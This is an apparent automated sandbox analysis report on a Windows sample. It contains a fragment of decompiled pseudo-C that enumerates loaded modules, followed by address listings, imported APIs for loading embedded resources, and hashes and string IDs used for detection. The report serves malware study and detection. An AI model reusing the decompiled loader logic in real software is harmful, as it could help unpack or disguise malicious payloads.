										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
											break;
										} else {
											_t488 = _t488 + 2;
											_t548 = _t548 + 2;
											__eflags = _t432;
											if(_t432 != 0) {
												continue;
											} else {
												goto L16;
											}
										}
									}
									L18:
									__eflags = _t432;
									if(_t432 == 0) {
										goto L10;
									} else {
										_t435 = Module32Next(_t525, _t557 + 0x278);
										__eflags = _t435;
										if(_t435 != 0) {
											do {
												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
												_t566 = _t557 + 8;
												_t549 = _t437;
												_t490 = _t566 + 0x298;
												while(1) {
													_t438 =  *_t490;
													__eflags = _t438 -  *_t549;
													if(_t438 !=  *_t549) {
														break;
													}
													__eflags = _t438;
													if(_t438 == 0) {
														L26:
														_t438 = 0;
													} else {
														_t438 =  *((intOrPtr*)(_t490 + 1));
														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
															break;
														} else {
															_t490 = _t490 + 2;
															_t549 = _t549 + 2;
															__eflags = _t438;
															if(_t438 != 0) {
																continue;
															} else {
																goto L26;
															}
														}
													}
													L28:
													__eflags = _t438;
													if(_t438 == 0) {
														goto L10;
													} else {
														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
														_t557 = _t566 + 8;
														_t550 = _t439;
														_t492 = _t557 + 0x298;
														while(1) {
															_t440 =  *_t492;
															__eflags = _t440 -  *_t550;
															if(_t440 !=  *_t550) {
																break;
															}
															__eflags = _t440;
															if(_t440 == 0) {
																L34:
																_t440 = 0;
															} else {
																_t440 =  *((intOrPtr*)(_t492 + 1));
																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
																	break;
																} else {
																	_t492 = _t492 + 2;
																	_t550 = _t550 + 2;
																	__eflags = _t440;
																	if(_t440 != 0) {
																		continue;
																	} else {
																		goto L34;
																	}
																}
															}
															L36:
															__eflags = _t440;
															if(_t440 == 0) {
																goto L10;
															} else {
																goto L37;
															}
															goto L81;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L36;
													}
													goto L81;
												}
												asm("sbb eax, eax");
												asm("sbb eax, 0xffffffff");
												goto L28;
												L37:
												_t442 = Module32Next(_t525, _t557 + 0x278);
												__eflags = _t442;
											} while (_t442 != 0);
										}
										goto L38;
									}
									goto L81;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L18;
							} else {
								L10:
								CloseHandle(_t525);
								return 0;
							}
							goto L81;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L9;
					}
				}
				L81:
			}

































































































                                                                                                                                                  0x004019f0
                                                                                                                                                  0x004019f0
                                                                                                                                                  0x004019fd
                                                                                                                                                  0x00401a10
                                                                                                                                                  0x00401a15
                                                                                                                                                  0x00401a1a
                                                                                                                                                  0x00401a1f
                                                                                                                                                  0x00401a24
                                                                                                                                                  0x00401a29
                                                                                                                                                  0x00401a2e
                                                                                                                                                  0x00401a33
                                                                                                                                                  0x00401a38
                                                                                                                                                  0x00401a3d
                                                                                                                                                  0x00401a42
                                                                                                                                                  0x00401a47
                                                                                                                                                  0x00401a4c
                                                                                                                                                  0x00401a51
                                                                                                                                                  0x00401a56
                                                                                                                                                  0x00401a5b
                                                                                                                                                  0x00401a60
                                                                                                                                                  0x00401a65
                                                                                                                                                  0x00401a6a
                                                                                                                                                  0x00401a6f
                                                                                                                                                  0x00401a74
                                                                                                                                                  0x00401a79
                                                                                                                                                  0x00401a7e
                                                                                                                                                  0x00401a83
                                                                                                                                                  0x00401a88
                                                                                                                                                  0x00401a8d
                                                                                                                                                  0x00401a92
                                                                                                                                                  0x00401a97
                                                                                                                                                  0x00401a9c
                                                                                                                                                  0x00401aa1
                                                                                                                                                  0x00401aa6
                                                                                                                                                  0x00401aab
                                                                                                                                                  0x00401ab0
                                                                                                                                                  0x00401ab9
                                                                                                                                                  0x00401aba
                                                                                                                                                  0x00401abf
                                                                                                                                                  0x00401ac7
                                                                                                                                                  0x0040248d
                                                                                                                                                  0x0040248d
                                                                                                                                                  0x00402496
                                                                                                                                                  0x00401acd
                                                                                                                                                  0x00401ad6
                                                                                                                                                  0x00401ae2
                                                                                                                                                  0x00401ae6
                                                                                                                                                  0x00401af1
                                                                                                                                                  0x00401af6
                                                                                                                                                  0x00401afb
                                                                                                                                                  0x00401b00
                                                                                                                                                  0x00401b05
                                                                                                                                                  0x00401b0a
                                                                                                                                                  0x00401b0f
                                                                                                                                                  0x00401b14
                                                                                                                                                  0x00401b19
                                                                                                                                                  0x00401b1e
                                                                                                                                                  0x00401b23
                                                                                                                                                  0x00401b28
                                                                                                                                                  0x00401b2d
                                                                                                                                                  0x00401b32
                                                                                                                                                  0x00401b37
                                                                                                                                                  0x00401b3c
                                                                                                                                                  0x00401b41
                                                                                                                                                  0x00401b46
                                                                                                                                                  0x00401b4b
                                                                                                                                                  0x00401b50
                                                                                                                                                  0x00401b55
                                                                                                                                                  0x00401b5a
                                                                                                                                                  0x00401b5f
                                                                                                                                                  0x00401b64
                                                                                                                                                  0x00401b69
                                                                                                                                                  0x00401b6e
                                                                                                                                                  0x00401b73
                                                                                                                                                  0x00401b78
                                                                                                                                                  0x00401b7d
                                                                                                                                                  0x00401b85
                                                                                                                                                  0x00401b8d
                                                                                                                                                  0x00401b95
                                                                                                                                                  0x00401b9d
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x00401ba9
                                                                                                                                                  0x00401bae
                                                                                                                                                  0x00401bb3
                                                                                                                                                  0x00401bb8
                                                                                                                                                  0x00401bbd
                                                                                                                                                  0x00401bc2
                                                                                                                                                  0x00401bc7
                                                                                                                                                  0x00401bcc
                                                                                                                                                  0x00401bd1
                                                                                                                                                  0x00401bd6
                                                                                                                                                  0x00401bdb
                                                                                                                                                  0x00401be0
                                                                                                                                                  0x00401be5
                                                                                                                                                  0x00401bea
                                                                                                                                                  0x00401bef
                                                                                                                                                  0x00401bf4
                                                                                                                                                  0x00401bf9
                                                                                                                                                  0x00401bfe
                                                                                                                                                  0x00401c03
                                                                                                                                                  0x00401c08
                                                                                                                                                  0x00401c0d
                                                                                                                                                  0x00401c12
                                                                                                                                                  0x00401c17
                                                                                                                                                  0x00401c1c
                                                                                                                                                  0x00401c21
                                                                                                                                                  0x00401c26
                                                                                                                                                  0x00401c2b
                                                                                                                                                  0x00401c30
                                                                                                                                                  0x00401c35
                                                                                                                                                  0x00401c3a
                                                                                                                                                  0x00401c3f
                                                                                                                                                  0x00401c44
                                                                                                                                                  0x00401c48
                                                                                                                                                  0x00401c4f
                                                                                                                                                  0x00401dc3
                                                                                                                                                  0x00401dc4
                                                                                                                                                  0x00401de0
                                                                                                                                                  0x00401de2
                                                                                                                                                  0x00401de7
                                                                                                                                                  0x00401dec
                                                                                                                                                  0x00401df1
                                                                                                                                                  0x00401df6
                                                                                                                                                  0x00401dfb
                                                                                                                                                  0x00401e00
                                                                                                                                                  0x00401e05
                                                                                                                                                  0x00401e0a
                                                                                                                                                  0x00401e0f
                                                                                                                                                  0x00401e14
                                                                                                                                                  0x00401e19
                                                                                                                                                  0x00401e1e
                                                                                                                                                  0x00401e23
                                                                                                                                                  0x00401e28
                                                                                                                                                  0x00401e2d
                                                                                                                                                  0x00401e32
                                                                                                                                                  0x00401e37
                                                                                                                                                  0x00401e3c
                                                                                                                                                  0x00401e41
                                                                                                                                                  0x00401e46
                                                                                                                                                  0x00401e4b
                                                                                                                                                  0x00401e50
                                                                                                                                                  0x00401e55
                                                                                                                                                  0x00401e5a
                                                                                                                                                  0x00401e5f
                                                                                                                                                  0x00401e64
                                                                                                                                                  0x00401e69
                                                                                                                                                  0x00401e6e
                                                                                                                                                  0x00401e73
                                                                                                                                                  0x00401e78
                                                                                                                                                  0x00401e7d
                                                                                                                                                  0x00401e82
                                                                                                                                                  0x00401e86
                                                                                                                                                  0x00401e8b
                                                                                                                                                  0x00401e96
                                                                                                                                                  0x00401e9a
                                                                                                                                                  0x00401ea4
                                                                                                                                                  0x00401eaf
                                                                                                                                                  0x00401eba
                                                                                                                                                  0x00401ebf
                                                                                                                                                  0x00401ec4
                                                                                                                                                  0x00401ec6
                                                                                                                                                  0x00401ecb
                                                                                                                                                  0x00401ece
                                                                                                                                                  0x00401ed2
                                                                                                                                                  0x00401ed4
                                                                                                                                                  0x00401eef
                                                                                                                                                  0x00401ed6
                                                                                                                                                  0x00401edd
                                                                                                                                                  0x00401ee2
                                                                                                                                                  0x00401ee6
                                                                                                                                                  0x00401ee9
                                                                                                                                                  0x00401ee9
                                                                                                                                                  0x00401ef7
                                                                                                                                                  0x00401efc
                                                                                                                                                  0x00401f02
                                                                                                                                                  0x00401f08
                                                                                                                                                  0x00401f0c
                                                                                                                                                  0x00401f15
                                                                                                                                                  0x00401f18
                                                                                                                                                  0x00401f1a
                                                                                                                                                  0x00401f1c
                                                                                                                                                  0x00401f22
                                                                                                                                                  0x00401f22
                                                                                                                                                  0x00401f24
                                                                                                                                                  0x00401f28
                                                                                                                                                  0x00401f2f
                                                                                                                                                  0x00401f33
                                                                                                                                                  0x00401f33
                                                                                                                                                  0x00401f40
                                                                                                                                                  0x00401f45
                                                                                                                                                  0x00401f4a
                                                                                                                                                  0x00401f4b
                                                                                                                                                  0x00401f50
                                                                                                                                                  0x00401f58
                                                                                                                                                  0x00401f58
                                                                                                                                                  0x00401f58
                                                                                                                                                  0x00401f58
                                                                                                                                                  0x00401f33
                                                                                                                                                  0x00401f63
                                                                                                                                                  0x00401f63
                                                                                                                                                  0x00401f69
                                                                                                                                                  0x00401f72
                                                                                                                                                  0x00401f72
                                                                                                                                                  0x00401f72
                                                                                                                                                  0x00401f73
                                                                                                                                                  0x00401f75
                                                                                                                                                  0x00401f7b
                                                                                                                                                  0x00401f80
                                                                                                                                                  0x00401f81
                                                                                                                                                  0x00401f86
                                                                                                                                                  0x00401f86
                                                                                                                                                  0x00401f8c
                                                                                                                                                  0x00401f8d
                                                                                                                                                  0x00401f8d
                                                                                                                                                  0x00401f9d
                                                                                                                                                  0x00401fa2
                                                                                                                                                  0x00401fa6
                                                                                                                                                  0x00401fac
                                                                                                                                                  0x00401faf
                                                                                                                                                  0x00401fb6
                                                                                                                                                  0x00401fbf
                                                                                                                                                  0x00401fc4
                                                                                                                                                  0x00401fc8
                                                                                                                                                  0x00401fce
                                                                                                                                                  0x00401fd3
                                                                                                                                                  0x00401fe0
                                                                                                                                                  0x00401fec
                                                                                                                                                  0x00401ffe
                                                                                                                                                  0x00402001
                                                                                                                                                  0x00402006
                                                                                                                                                  0x0040200b
                                                                                                                                                  0x00402010
                                                                                                                                                  0x00402015
                                                                                                                                                  0x0040201a
                                                                                                                                                  0x0040201f
                                                                                                                                                  0x00402024
                                                                                                                                                  0x00402029
                                                                                                                                                  0x0040202e
                                                                                                                                                  0x00402033
                                                                                                                                                  0x00402038
                                                                                                                                                  0x0040203d
                                                                                                                                                  0x00402042
                                                                                                                                                  0x00402047
                                                                                                                                                  0x0040204c
                                                                                                                                                  0x00402051
                                                                                                                                                  0x00402056
                                                                                                                                                  0x0040205b
                                                                                                                                                  0x00402060
                                                                                                                                                  0x00402065
                                                                                                                                                  0x0040206a
                                                                                                                                                  0x0040206f
                                                                                                                                                  0x00402074
                                                                                                                                                  0x00402079
                                                                                                                                                  0x0040207e
                                                                                                                                                  0x00402083
                                                                                                                                                  0x00402088
                                                                                                                                                  0x0040208d
                                                                                                                                                  0x00402092
                                                                                                                                                  0x00402097
                                                                                                                                                  0x0040209c
                                                                                                                                                  0x004020a1
                                                                                                                                                  0x004020a5
                                                                                                                                                  0x004020aa
                                                                                                                                                  0x004020ae
                                                                                                                                                  0x004020b4
                                                                                                                                                  0x004020b6
                                                                                                                                                  0x004020bb
                                                                                                                                                  0x004020c0
                                                                                                                                                  0x004020c5
                                                                                                                                                  0x004020ca
                                                                                                                                                  0x004020cf
                                                                                                                                                  0x004020d4
                                                                                                                                                  0x004020e1
                                                                                                                                                  0x004020e6
                                                                                                                                                  0x004020eb
                                                                                                                                                  0x004020f0
                                                                                                                                                  0x004020f5
                                                                                                                                                  0x004020fa
                                                                                                                                                  0x004020ff
                                                                                                                                                  0x00402104
                                                                                                                                                  0x00402109
                                                                                                                                                  0x0040210e
                                                                                                                                                  0x00402113
                                                                                                                                                  0x00402118
                                                                                                                                                  0x0040211d
                                                                                                                                                  0x00402122
                                                                                                                                                  0x00402127
                                                                                                                                                  0x0040212c
                                                                                                                                                  0x00402131
                                                                                                                                                  0x00402136
                                                                                                                                                  0x0040213b
                                                                                                                                                  0x00402140
                                                                                                                                                  0x00402145
                                                                                                                                                  0x0040214a
                                                                                                                                                  0x0040214f
                                                                                                                                                  0x00402154
                                                                                                                                                  0x00402159
                                                                                                                                                  0x0040215e
                                                                                                                                                  0x00402163
                                                                                                                                                  0x00402167
                                                                                                                                                  0x0040216c
                                                                                                                                                  0x00402171
                                                                                                                                                  0x00402177
                                                                                                                                                  0x00402179
                                                                                                                                                  0x0040217c
                                                                                                                                                  0x0040217e
                                                                                                                                                  0x00402183
                                                                                                                                                  0x00402188
                                                                                                                                                  0x0040218f
                                                                                                                                                  0x00402196
                                                                                                                                                  0x0040219a
                                                                                                                                                  0x0040219e
                                                                                                                                                  0x004021a2
                                                                                                                                                  0x004021a4
                                                                                                                                                  0x004021bc
                                                                                                                                                  0x004021be
                                                                                                                                                  0x004021c0
                                                                                                                                                  0x004021c6
                                                                                                                                                  0x004021ca
                                                                                                                                                  0x004021e5
                                                                                                                                                  0x004021ec
                                                                                                                                                  0x004021f1
                                                                                                                                                  0x00402213
                                                                                                                                                  0x00402215
                                                                                                                                                  0x00402217
                                                                                                                                                  0x0040221d
                                                                                                                                                  0x00402239
                                                                                                                                                  0x0040223b
                                                                                                                                                  0x0040223d
                                                                                                                                                  0x00402243
                                                                                                                                                  0x0040224d
                                                                                                                                                  0x0040224f
                                                                                                                                                  0x00402251
                                                                                                                                                  0x00402260
                                                                                                                                                  0x00402264
                                                                                                                                                  0x00402269
                                                                                                                                                  0x00402277
                                                                                                                                                  0x0040227b
                                                                                                                                                  0x00402286
                                                                                                                                                  0x00402293
                                                                                                                                                  0x004022af
                                                                                                                                                  0x004022b1
                                                                                                                                                  0x004022b5
                                                                                                                                                  0x004022b7
                                                                                                                                                  0x004022be
                                                                                                                                                  0x004022be
                                                                                                                                                  0x004022d7
                                                                                                                                                  0x004022e8
                                                                                                                                                  0x004022ef
                                                                                                                                                  0x004022f6
                                                                                                                                                  0x00402300
                                                                                                                                                  0x00402304
                                                                                                                                                  0x00402308
                                                                                                                                                  0x00402315
                                                                                                                                                  0x0040231a
                                                                                                                                                  0x0040231e
                                                                                                                                                  0x00402324
                                                                                                                                                  0x00402328
                                                                                                                                                  0x0040232a
                                                                                                                                                  0x00402331
                                                                                                                                                  0x00402331
                                                                                                                                                  0x0040234e
                                                                                                                                                  0x00402350
                                                                                                                                                  0x00402352
                                                                                                                                                  0x00402355
                                                                                                                                                  0x00402355
                                                                                                                                                  0x0040235b
                                                                                                                                                  0x0040235f
                                                                                                                                                  0x00402361
                                                                                                                                                  0x00402368
                                                                                                                                                  0x00402368
                                                                                                                                                  0x0040236d
                                                                                                                                                  0x00402371
                                                                                                                                                  0x00402373
                                                                                                                                                  0x00402375
                                                                                                                                                  0x0040237b
                                                                                                                                                  0x0040237b
                                                                                                                                                  0x00402377
                                                                                                                                                  0x00402377
                                                                                                                                                  0x00402377
                                                                                                                                                  0x00402390
                                                                                                                                                  0x00402396
                                                                                                                                                  0x0040239c
                                                                                                                                                  0x004023a0
                                                                                                                                                  0x004023a2
                                                                                                                                                  0x004023a9
                                                                                                                                                  0x004023a9
                                                                                                                                                  0x004023ae
                                                                                                                                                  0x004023b2
                                                                                                                                                  0x004023b4
                                                                                                                                                  0x004023ba
                                                                                                                                                  0x004023ba
                                                                                                                                                  0x004023b6
                                                                                                                                                  0x004023b6
                                                                                                                                                  0x004023b6
                                                                                                                                                  0x004023ce
                                                                                                                                                  0x004023d1
                                                                                                                                                  0x004023d3
                                                                                                                                                  0x004023dd
                                                                                                                                                  0x004023ec
                                                                                                                                                  0x004023ef
                                                                                                                                                  0x004023fe
                                                                                                                                                  0x00402401
                                                                                                                                                  0x00402403
                                                                                                                                                  0x00402411
                                                                                                                                                  0x00402417
                                                                                                                                                  0x00402424
                                                                                                                                                  0x00402426
                                                                                                                                                  0x0040242a
                                                                                                                                                  0x0040242c
                                                                                                                                                  0x00402434
                                                                                                                                                  0x00402434
                                                                                                                                                  0x0040243a
                                                                                                                                                  0x0040243f
                                                                                                                                                  0x00402443
                                                                                                                                                  0x00402445
                                                                                                                                                  0x0040244d
                                                                                                                                                  0x0040244d
                                                                                                                                                  0x00402445
                                                                                                                                                  0x00402251
                                                                                                                                                  0x0040223d
                                                                                                                                                  0x0040244f
                                                                                                                                                  0x0040245d
                                                                                                                                                  0x0040245f
                                                                                                                                                  0x00402461
                                                                                                                                                  0x00402462
                                                                                                                                                  0x00402467
                                                                                                                                                  0x00402467
                                                                                                                                                  0x0040245f
                                                                                                                                                  0x004021ca
                                                                                                                                                  0x0040246a
                                                                                                                                                  0x0040246e
                                                                                                                                                  0x00402470
                                                                                                                                                  0x00402478
                                                                                                                                                  0x00402478
                                                                                                                                                  0x0040247a
                                                                                                                                                  0x0040247e
                                                                                                                                                  0x00402480
                                                                                                                                                  0x00402488
                                                                                                                                                  0x00402488
                                                                                                                                                  0x00402480
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401c55
                                                                                                                                                  0x00401c62
                                                                                                                                                  0x00401c67
                                                                                                                                                  0x00401c6a
                                                                                                                                                  0x00401c6c
                                                                                                                                                  0x00401c73
                                                                                                                                                  0x00401c73
                                                                                                                                                  0x00401c77
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401c7b
                                                                                                                                                  0x00401c8f
                                                                                                                                                  0x00401c8f
                                                                                                                                                  0x00401c7d
                                                                                                                                                  0x00401c7d
                                                                                                                                                  0x00401c83
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401c85
                                                                                                                                                  0x00401c85
                                                                                                                                                  0x00401c88
                                                                                                                                                  0x00401c8d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401c8d
                                                                                                                                                  0x00401c83
                                                                                                                                                  0x00401c98
                                                                                                                                                  0x00401c9a
                                                                                                                                                  0x00401cbd
                                                                                                                                                  0x00401cc2
                                                                                                                                                  0x00401cc5
                                                                                                                                                  0x00401cc7
                                                                                                                                                  0x00401cd0
                                                                                                                                                  0x00401cd0
                                                                                                                                                  0x00401cd2
                                                                                                                                                  0x00401cd4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401cd6
                                                                                                                                                  0x00401cd8
                                                                                                                                                  0x00401cec
                                                                                                                                                  0x00401cec
                                                                                                                                                  0x00401cda
                                                                                                                                                  0x00401cda
                                                                                                                                                  0x00401cdd
                                                                                                                                                  0x00401ce0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401ce2
                                                                                                                                                  0x00401ce2
                                                                                                                                                  0x00401ce5
                                                                                                                                                  0x00401ce8
                                                                                                                                                  0x00401cea
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401cea
                                                                                                                                                  0x00401ce0
                                                                                                                                                  0x00401cf5
                                                                                                                                                  0x00401cf5
                                                                                                                                                  0x00401cf7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401cf9
                                                                                                                                                  0x00401d02
                                                                                                                                                  0x00401d07
                                                                                                                                                  0x00401d09
                                                                                                                                                  0x00401d10
                                                                                                                                                  0x00401d1d
                                                                                                                                                  0x00401d22
                                                                                                                                                  0x00401d25
                                                                                                                                                  0x00401d27
                                                                                                                                                  0x00401d30
                                                                                                                                                  0x00401d30
                                                                                                                                                  0x00401d32
                                                                                                                                                  0x00401d34
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d36
                                                                                                                                                  0x00401d38
                                                                                                                                                  0x00401d4c
                                                                                                                                                  0x00401d4c
                                                                                                                                                  0x00401d3a
                                                                                                                                                  0x00401d3a
                                                                                                                                                  0x00401d3d
                                                                                                                                                  0x00401d40
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d42
                                                                                                                                                  0x00401d42
                                                                                                                                                  0x00401d45
                                                                                                                                                  0x00401d48
                                                                                                                                                  0x00401d4a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d4a
                                                                                                                                                  0x00401d40
                                                                                                                                                  0x00401d55
                                                                                                                                                  0x00401d55
                                                                                                                                                  0x00401d57
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d5d
                                                                                                                                                  0x00401d6a
                                                                                                                                                  0x00401d6f
                                                                                                                                                  0x00401d72
                                                                                                                                                  0x00401d74
                                                                                                                                                  0x00401d80
                                                                                                                                                  0x00401d80
                                                                                                                                                  0x00401d82
                                                                                                                                                  0x00401d84
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d86
                                                                                                                                                  0x00401d88
                                                                                                                                                  0x00401d9c
                                                                                                                                                  0x00401d9c
                                                                                                                                                  0x00401d8a
                                                                                                                                                  0x00401d8a
                                                                                                                                                  0x00401d8d
                                                                                                                                                  0x00401d90
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d92
                                                                                                                                                  0x00401d92
                                                                                                                                                  0x00401d95
                                                                                                                                                  0x00401d98
                                                                                                                                                  0x00401d9a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d9a
                                                                                                                                                  0x00401d90
                                                                                                                                                  0x00401da5
                                                                                                                                                  0x00401da5
                                                                                                                                                  0x00401da7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401da7
                                                                                                                                                  0x00401da0
                                                                                                                                                  0x00401da2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401da2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d57
                                                                                                                                                  0x00401d50
                                                                                                                                                  0x00401d52
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401dad
                                                                                                                                                  0x00401db6
                                                                                                                                                  0x00401dbb
                                                                                                                                                  0x00401dbb
                                                                                                                                                  0x00401d10
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d09
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401cf7
                                                                                                                                                  0x00401cf0
                                                                                                                                                  0x00401cf2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401c9c
                                                                                                                                                  0x00401c9c
                                                                                                                                                  0x00401c9d
                                                                                                                                                  0x00401caf
                                                                                                                                                  0x00401caf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401c9a
                                                                                                                                                  0x00401c93
                                                                                                                                                  0x00401c95
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401c95
                                                                                                                                                  0x00401c4f
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                                  • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00401AD6
                                                                                                                                                  • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                                                  • Module32Next.KERNEL32 ref: 00401D02
                                                                                                                                                  • Module32Next.KERNEL32 ref: 00401DB6
                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                                  • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                                  • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                                  • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                                  • _memset.LIBCMT ref: 00401EDD
                                                                                                                                                  • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                                  • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                  • API String ID: 2366190142-2962942730
                                                                                                                                                  • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                  • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                  • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                  • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00493311, Relevance: 8.7, Strings: 4, Instructions: 3678COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927461711.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ClI$ClI$ClI$NfI
                                                                                                                                                  • API String ID: 0-921371272
                                                                                                                                                  • Opcode ID: 3baea77ce4bcb6d105bfc386ab2eb737150d198dff40f775fcce265fd8861e98
                                                                                                                                                  • Instruction ID: 5962801a59a5ae71f7ad97e42d5ab64967e197cb82ba9bdefb4fe30b7c10f32f
                                                                                                                                                  • Opcode Fuzzy Hash: 3baea77ce4bcb6d105bfc386ab2eb737150d198dff40f775fcce265fd8861e98
                                                                                                                                                  • Instruction Fuzzy Hash: 6F73A130D14B498ECB11DF68C855AD9FBB1FF95300F15C6AAE448AB251EB34AAC5CF81
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00493048, Relevance: 4.1, Strings: 1, Instructions: 2860COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927461711.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: HZI
                                                                                                                                                  • API String ID: 0-3466348928
                                                                                                                                                  • Opcode ID: 8c46f36fb2f176a841c82a78cca796a4df0eb65c1f9623de621a456fc69056a4
                                                                                                                                                  • Instruction ID: 4b9c7b1f43ea98233d13cd0a725135ef23b4b0b5bfd01523ee0bb7f3b2d32afc
                                                                                                                                                  • Opcode Fuzzy Hash: 8c46f36fb2f176a841c82a78cca796a4df0eb65c1f9623de621a456fc69056a4
                                                                                                                                                  • Instruction Fuzzy Hash: 63531D30D10B19CECB11EF68C944A99F7B1FF99314F15C6AAE458A7221EB74AAC4CF41
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0049BC78, Relevance: 2.8, Strings: 2, Instructions: 276COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927461711.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: d@F$#Sl^
                                                                                                                                                  • API String ID: 0-1127405496
                                                                                                                                                  • Opcode ID: 5fda43d6812c8b3c47e9d1f62f88211bc3c3db32e8297b7619e7b253504b0f45
                                                                                                                                                  • Instruction ID: 61d4192072b47dde6cc7defe7bef6cea2dac3fc9fceb7b877fc08cf9c8b72b88
                                                                                                                                                  • Opcode Fuzzy Hash: 5fda43d6812c8b3c47e9d1f62f88211bc3c3db32e8297b7619e7b253504b0f45
                                                                                                                                                  • Instruction Fuzzy Hash: 74919034B002145BEB04AB7999557AE7AE7EF84704F14843AE506DB384EF7CDD028BDA
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

